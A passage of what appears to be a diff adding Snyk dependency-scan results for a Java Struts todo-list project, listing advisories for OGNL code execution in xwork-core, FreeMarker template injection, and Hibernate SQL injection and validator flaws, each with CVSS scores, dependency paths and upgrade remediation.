"severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:53.537810Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.429176Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation such that the `TextParseUtil.translateVariables` method allows remote attackers to execute arbitrary code via a crafted OGNL expression with ANTLR tooling.\r\n\r\n**Note:**\r\n\r\nThe Struts 2 framework does not pass any user-modifiable input to this method, neither directly nor indirectly. However, a developer crafting a Struts based web application might pass unsanitized user input to `TextParseUtil.translateVariables` or ActionSupport's `getText` methods. In that case a RCE exploitation might be possible.\r\n\r\n## Workaround\r\n\r\nUsers who are unable to upgrade to the fixed version should not pass unsanitized user input to framework methods that include OGNL expression evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.24.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/f420f28466cb82915defc4e12466b298c275abaf)\n- [Issue](https://struts.apache.org/docs/s2-027.html)\n", + "epssDetails": { + "percentile": "0.86301", + "probability": "0.01352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3090" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-ggmp-fxfg-277r" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2023-08-01T07:46:40.919855Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-14T03:15:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + 
"type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2023-08-01T09:22:02.765398Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.429176Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGFREEMARKER-1076795", + "title": "Server-side Template Injection (SSTI)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Ackcent" + ], + "semver": { + "vulnerable": [ + "[,2.3.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.freemarker:freemarker", + "references": [ + { + "url": "https://github.com/apache/freemarker/pull/62", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/FREEMARKER-124", + "title": "Jira Issue" + }, + { + "url": "https://ackcent.com/in-depth-freemarker-template-injection/", + "title": "Research Blogpost" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-06T14:04:29.670906Z" + } + ], + "description": "## Overview\n[org.freemarker:freemarker](https://github.com/apache/freemarker) is a \"template engine\"; a generic tool to generate text output (anything from HTML to auto generated source code) based on templates.\n\nAffected versions of this package are vulnerable to Server-side Template Injection (SSTI). By allowing user input into `java.security.ProtectionDomain.getClassLoader`, templates will get access to the java classloader. This can be further leveraged for file system access and code execution. A low-privileged user is sufficient for exploitation of this vulnerability.\n## Remediation\nUpgrade `org.freemarker:freemarker` to version 2.3.30 or higher.\n## References\n- [GitHub PR](https://github.com/apache/freemarker/pull/62)\n- [Jira Issue](https://issues.apache.org/jira/browse/FREEMARKER-124)\n- [Research Blogpost](https://ackcent.com/in-depth-freemarker-template-injection/)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.freemarker:freemarker", + "proprietary": false, + "creationTime": "2021-02-19T11:41:17.941362Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-09T11:33:30Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.freemarker", + "artifactId": "freemarker" + }, + "publicationTime": "2021-02-19T15:54:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T14:04:29.670906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19" + ], + "upgradePath": [ 
+ false, + "org.apache.struts:struts2-core@2.5.25", + "org.freemarker:freemarker@2.3.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.freemarker:freemarker", + "version": "2.3.19" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", 
+ "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and 
frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": 
"toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": 
"org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. 
A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
"org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + 
{ + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" 
+ ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": 
"https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
